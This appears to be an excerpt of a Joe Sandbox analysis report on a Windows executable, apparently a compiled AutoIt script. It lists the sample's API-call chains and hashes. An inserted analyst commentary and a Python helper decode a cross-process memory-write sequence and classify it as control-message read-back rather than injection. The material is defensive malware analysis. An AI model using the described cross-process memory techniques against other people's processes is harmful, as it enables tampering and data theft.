                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3368777196-0
                                                                                                                        • Opcode ID: 148bd96c62c13bfa7070749371cde9f0df2f9776d435597f58cb75904a2bf23d
                                                                                                                        • Instruction ID: 4500ba0523c5062cea205dafcd198b214d5d59c943d0a2c7110aba8eaec8f3da
                                                                                                                        • Opcode Fuzzy Hash: 148bd96c62c13bfa7070749371cde9f0df2f9776d435597f58cb75904a2bf23d
                                                                                                                        • Instruction Fuzzy Hash: 34415B71A00205EBDF55AF54EC85AAA7B78FF45310F1440B9ED00AA297DB30DE69DBA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                                                                                        • _wcslen.LIBCMT ref: 0058587B
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00585995
                                                                                                                        • CoCreateInstance.OLE32(005AFCF8,00000000,00000001,005AFB68,?), ref: 005859AE
                                                                                                                        • CoUninitialize.OLE32 ref: 005859CC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                        • Opcode ID: 66add4af07420ba6520e94311120401a5537471fe4e827a8e4178f8d80feeec8
                                                                                                                        • Instruction ID: df1f498cf2d8dc26ba8d104b54e7ceb7076030961fc1a982c014677c50aa6180
                                                                                                                        • Opcode Fuzzy Hash: 66add4af07420ba6520e94311120401a5537471fe4e827a8e4178f8d80feeec8
                                                                                                                        • Instruction Fuzzy Hash: 7DD155716046029FC714EF24C484A6ABBF6FF89715F14485DF88AAB361EB31EC45CB92
APIs
  • Part of subcall function 00570FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00570FCA
  • Part of subcall function 00570FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00570FD6
  • Part of subcall function 00570FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00570FE5
  • Part of subcall function 00570FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00570FEC
  • Part of subcall function 00570FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00571002
• GetLengthSid.ADVAPI32(?,00000000,00571335), ref: 005717AE
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 005717BA
• HeapAlloc.KERNEL32(00000000), ref: 005717C1
• CopySid.ADVAPI32(00000000,00000000,?), ref: 005717DA
• GetProcessHeap.KERNEL32(00000000,00000000,00571335), ref: 005717EE
• HeapFree.KERNEL32(00000000), ref: 005717F5
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005714FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00571506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00571515
• CloseHandle.KERNEL32(00000004), ref: 00571520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0057154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00571563
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
• GetLastError.KERNEL32(?,?,00533379,00532FE5), ref: 00533390
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0053339E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005333B7
• SetLastError.KERNEL32(00000000,?,00533379,00532FE5), ref: 00533409
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,00545686,00553CD6,?,00000000,?,00545B6A,?,?,?,?,?,0053E6D1,?,005D8A48), ref: 00542D78
• _free.LIBCMT ref: 00542DAB
• _free.LIBCMT ref: 00542DD3
• SetLastError.KERNEL32(00000000,?,?,?,?,0053E6D1,?,005D8A48,00000010,00514F4A,?,?,00000000,00553CD6), ref: 00542DE0
• SetLastError.KERNEL32(00000000,?,?,?,?,0053E6D1,?,005D8A48,00000010,00514F4A,?,?,00000000,00553CD6), ref: 00542DEC
• _abort.LIBCMT ref: 00542DF2
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
  • Part of subcall function 00529639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
  • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296A2
  • Part of subcall function 00529639: BeginPath.GDI32(?), ref: 005296B9
  • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296E2
• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 005A8A4E
• LineTo.GDI32(?,00000003,00000000), ref: 005A8A62
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 005A8A70
• LineTo.GDI32(?,00000000,00000003), ref: 005A8A80
• EndPath.GDI32(?), ref: 005A8A90
• StrokePath.GDI32(?), ref: 005A8AA0
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
APIs
• GetDC.USER32(00000000), ref: 00575218
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00575229
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00575230
• ReleaseDC.USER32(00000000,00000000), ref: 00575238
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0057524F
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 00575261
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00511BF4
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00511BFC
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00511C07
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00511C12
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00511C1A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00511C22
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
                                                                                                                        • Opcode ID: b6fc38aaa8901985c9f2a787d21690b57a47ac0ad622e25252784ae949c0b537
                                                                                                                        • Instruction ID: 8104bd8a3a16777a0100d31c6e56535fe1fec174e2b76d9ba146ccab654f1ad9
                                                                                                                        • Opcode Fuzzy Hash: b6fc38aaa8901985c9f2a787d21690b57a47ac0ad622e25252784ae949c0b537
                                                                                                                        • Instruction Fuzzy Hash: 56016CB09027597DE3008F5A8C85B52FFE8FF19354F04411B915C4B941C7F5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0057EB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0057EB46
• GetWindowThreadProcessId.USER32(?,?), ref: 0057EB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB6E
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB75
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: cb8b2c5986061f3ecbe7529d368d2e85f1512affa14f6e349cd04dc55f1f8ae4
• Instruction ID: fc39b818e2df40502db5299f8939906dcd16140d734222746a9f8807cb6daf27
• Opcode Fuzzy Hash: cb8b2c5986061f3ecbe7529d368d2e85f1512affa14f6e349cd04dc55f1f8ae4
• Instruction Fuzzy Hash: E4F05E72240158BFE7219B669C0EEEF3E7CEFDBB11F004159F601D6091EBA05A05E6B5
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0057187F
• UnloadUserProfile.USERENV(?,?), ref: 0057188B
• CloseHandle.KERNEL32(?), ref: 00571894
• CloseHandle.KERNEL32(?), ref: 0057189C
• GetProcessHeap.KERNEL32(00000000,?), ref: 005718A5
• HeapFree.KERNEL32(00000000), ref: 005718AC
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 7b1f133492d5ece76174093fd546ca3583e09e08d24f743fd9ffd3a0e52d2b78
• Instruction ID: 53388d2a26a516a9766c5c590047ea269dd84adecef78addd8aa7507263693c6
• Opcode Fuzzy Hash: 7b1f133492d5ece76174093fd546ca3583e09e08d24f743fd9ffd3a0e52d2b78
• Instruction Fuzzy Hash: 63E0E536204101BBDB015FA1ED0C90ABF79FF6AB22B108625F22581070CB329425EF50
APIs
• __Init_thread_footer.LIBCMT ref: 0051BEB3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: Init_thread_footer
• String ID: D%^$D%^$D%^$D%^D%^
• API String ID: 1385522511-1929028606
• Opcode ID: ee0637ec5ae8d1e99c32a99323fdec80142ee181e792a72d4f7fcefe397a9730
• Instruction ID: 6f991f027e25756a3003fd0b7dcf529f9e945aea5314bd44430ac6a76bf9f4a1
• Opcode Fuzzy Hash: ee0637ec5ae8d1e99c32a99323fdec80142ee181e792a72d4f7fcefe397a9730
• Instruction Fuzzy Hash: D6913875A0020ACFEB18CF59C0906EABBF1FF58314F24856AD985AB351E731AD81DBD0
APIs
  • Part of subcall function 00530242: EnterCriticalSection.KERNEL32(005E070C,005E1884,?,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053024D
  • Part of subcall function 00530242: LeaveCriticalSection.KERNEL32(005E070C,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053028A
  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
  • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
• __Init_thread_footer.LIBCMT ref: 00597BFB
  • Part of subcall function 005301F8: EnterCriticalSection.KERNEL32(005E070C,?,?,00528747,005E2514), ref: 00530202
  • Part of subcall function 005301F8: LeaveCriticalSection.KERNEL32(005E070C,?,00528747,005E2514), ref: 00530235
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
• String ID: +TV$5$G$Variable must be of type 'Object'.
• API String ID: 535116098-200929741
• Opcode ID: df6bd5ab94a9ad3c096186925d2854cd3c3c13cb7424f0470224af7ef7d3781f
• Instruction ID: 5f0fb7d791387c32185073a1c367636e123ab176c65c60e18ac2b4aa22c28088
• Opcode Fuzzy Hash: df6bd5ab94a9ad3c096186925d2854cd3c3c13cb7424f0470224af7ef7d3781f
• Instruction Fuzzy Hash: 8A919D74A1420AEFCF04EF54D8959ADBFB5FF89300F14845AF8469B292DB71AE81CB50
APIs
  • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057C6EE
• _wcslen.LIBCMT ref: 0057C735
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057C79C
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0057C7CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: 0
• API String ID: 1227352736-4108050209
• Opcode ID: 8c12b89aa7b9e50b48aa6b4accfe19c2959572238dc4091454d7c4c3846d6ec9
• Instruction ID: a3dda11ab15fac253c6db574705e2fd073e956b4adf7794585aac684035722c4
• Opcode Fuzzy Hash: 8c12b89aa7b9e50b48aa6b4accfe19c2959572238dc4091454d7c4c3846d6ec9
• Instruction Fuzzy Hash: 9C51DF716043019BD7199F28E889B6B7FE8FF89310F048A2DF999D31D1DB70D944AB52
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 0059AEA3
  • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
• GetProcessId.KERNEL32(00000000), ref: 0059AF38
• CloseHandle.KERNEL32(00000000), ref: 0059AF67
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• API String ID: 146682121-1426351568
• Opcode ID: 613c9ded18b41d208ab18b85f1624bde5d908540c50ba1401d1e384087b3d84e
• Instruction ID: 90671fb062b8a2f915692e78eef52098666e0e30d31774189c009a972bd22642
• Opcode Fuzzy Hash: 613c9ded18b41d208ab18b85f1624bde5d908540c50ba1401d1e384087b3d84e
• Instruction Fuzzy Hash: 55715574A0021A9FDF14DF54C488A9EBBF5FF48300F048499E816AB392DB31ED85CBA1
APIs
• GetWindowRect.USER32(0151DD40,?), ref: 005A62E2
• ScreenToClient.USER32(?,?), ref: 005A6315
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 005A6382
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID: @U=u
• API String ID: 3880355969-2594219639
• Opcode ID: 52ec338d578cd0c20444c3495194bd77716a393a8eaf88a09e74580a5eab00b8
• Instruction ID: 1750203f7b1eaf19aaf35c07f46c79752b1c70fb1ba27bb79646e6d86bf0eadb
• Opcode Fuzzy Hash: 52ec338d578cd0c20444c3495194bd77716a393a8eaf88a09e74580a5eab00b8
• Instruction Fuzzy Hash: 2D514A74A00249EFCF14DF68D880AAE7BB5FF96360F14856AF8159B290D730ED81DB90
APIs
  • Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00572760
  • Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8
  • Part of subcall function 0057B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0057B355
  • Part of subcall function 0057B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B365
  • Part of subcall function 0057B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B37B
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005727CD
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0057281A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                        • String ID: @$@U=u
                                                                                                                        • API String ID: 4150878124-826235744
                                                                                                                        • Opcode ID: 064dbbebfd5c402402e3f11513dd621facdad38784f15445ffb929dc226f0c2f
                                                                                                                        • Instruction ID: b7b3cf812bcab17bab430310755f0f5b6b993fc0ed95593300527fad4b2626ab
                                                                                                                        • Opcode Fuzzy Hash: 064dbbebfd5c402402e3f11513dd621facdad38784f15445ffb929dc226f0c2f
                                                                                                                        • Instruction Fuzzy Hash: 9A416D72900219AFDB10DBA4DD45BDEBBB8FF45300F108099FA59B7181DB706E85DBA1
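The function record above is the one chain in this section that an analyst has to judge rather than just catalogue: GetWindowThreadProcessId, OpenProcess, VirtualAllocEx and WriteProcessMemory into a foreign process, followed by SendMessageW and ReadProcessMemory. Decoding the raw arguments the report prints is what separates the two readings. 0x438 passed to OpenProcess is PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE with no PROCESS_CREATE_THREAD; VirtualAllocEx uses MEM_COMMIT (0x1000) with PAGE_READWRITE (0x4), so the remote page is not executable; the messages are TVM_GETITEMRECT (0x1104) and TVM_HITTEST (0x1111), and the nearby stack values 0x1073 and 0x1004 are LVM_GETITEMTEXTW and LVM_GETITEMCOUNT. Those common-control messages require their item buffer to live in the target window's process, so the write, message, read-back sequence is how a process reads TreeView and ListView contents it does not own; given the "compiled AutoIt script" signature in the summary, the AutoIt runtime's ControlTreeView/ControlListView support is a plausible origin. That attribution is an inference, not a finding the report states. The helper below is an added example, not part of the Joe Sandbox report: it parses the eight "APIs" lines verbatim, decodes the constants from the Windows SDK values, and applies a heuristic that is this helper's own assumption (an executable remote allocation or a remote thread creation marks possible injection; write plus control message plus read-back on a non-executable buffer is the read-back idiom).

```python
"""Decode and classify the cross-process API chain recorded for the function above.

Added analyst helper; not part of the Joe Sandbox report. Constant values are
Windows SDK definitions; the 'verdict' heuristic is this helper's own assumption.
"""
import re
from dataclasses import dataclass

# Constructed sample input: the eight "APIs" lines of the function record above,
# copied verbatim from the report.
REPORT_LINES = """\
• Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00572760
• Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8
• Part of subcall function 0057B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0057B355
• Part of subcall function 0057B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B365
• Part of subcall function 0057B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B37B
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005727CD
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0057281A
"""

# One call per line in the report: "<api>.<module>(<hex or ? args>), ref: <addr>"
CALL_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Windows SDK constants (winnt.h / commctrl.h); only the bits this chain needs.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION",
}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_EXECUTABLE = {0x10, 0x20, 0x40, 0x80}  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
CONTROL_MESSAGES = {
    0x1004: "LVM_GETITEMCOUNT",  # LVM_FIRST + 4
    0x1073: "LVM_GETITEMTEXTW",  # LVM_FIRST + 115
    0x1104: "TVM_GETITEMRECT",   # TV_FIRST + 4
    0x1111: "TVM_HITTEST",       # TV_FIRST + 17
}
THREAD_CREATORS = {"CreateRemoteThread", "CreateRemoteThreadEx", "NtCreateThreadEx",
                   "RtlCreateUserThread", "QueueUserAPC"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # int per argument, None where the report prints '?'
    ref: int     # address of the call site


def parse_calls(text: str) -> list:
    """Parse report 'APIs' lines into ApiCall records; lines without a call are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a, 16)
                for a in m["args"].split(",") if a.strip()]
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def decode_flags(value: int, table: dict) -> list:
    """Names of every bit of `table` set in `value`, sorted for stable comparison."""
    return sorted(name for bit, name in table.items() if value & bit)


def classify(calls: list) -> dict:
    """Summarise the chain. Heuristic (assumption): an executable remote allocation,
    PROCESS_CREATE_THREAD or any remote thread creation marks possible injection;
    write + control message + read-back on a non-executable buffer is the
    common-control read-back idiom."""
    seen = {c.api for c in calls}
    result = {"access": [], "alloc_type": [], "executable_alloc": False,
              "messages": [], "creates_thread": False}
    for c in calls:
        if c.api == "OpenProcess" and c.args and c.args[0] is not None:
            result["access"] = decode_flags(c.args[0], PROCESS_ACCESS)
        elif c.api == "VirtualAllocEx" and len(c.args) >= 5:
            if c.args[3] is not None:
                result["alloc_type"] = decode_flags(c.args[3], MEM_FLAGS)
            if c.args[4] is not None:
                result["executable_alloc"] = c.args[4] in PAGE_EXECUTABLE
        elif c.api == "SendMessageW" and len(c.args) >= 2 and c.args[1] is not None:
            result["messages"].append(CONTROL_MESSAGES.get(c.args[1], f"0x{c.args[1]:04X}"))
        elif c.api in THREAD_CREATORS:
            result["creates_thread"] = True
    injection = (result["executable_alloc"] or result["creates_thread"]
                 or "PROCESS_CREATE_THREAD" in result["access"])
    readback = {"WriteProcessMemory", "SendMessageW", "ReadProcessMemory"} <= seen
    if injection:
        result["verdict"] = "possible injection"
    elif readback:
        result["verdict"] = "control-message read-back"
    else:
        result["verdict"] = "indeterminate"
    return result


if __name__ == "__main__":
    for key, value in classify(parse_calls(REPORT_LINES)).items():
        print(f"{key:17}: {value}")
```

Run on the lines above it reports the four-bit access mask, MEM_COMMIT, a non-executable allocation and the two TreeView messages, and returns "control-message read-back". The same parser run over a record whose VirtualAllocEx carries 0x40 (PAGE_EXECUTE_READWRITE), or whose chain includes CreateRemoteThread, flips the verdict to "possible injection", which is the case the report's "Writes to foreign memory regions" signature cannot distinguish on its own.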
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00577206
                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0057723C
                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0057724D
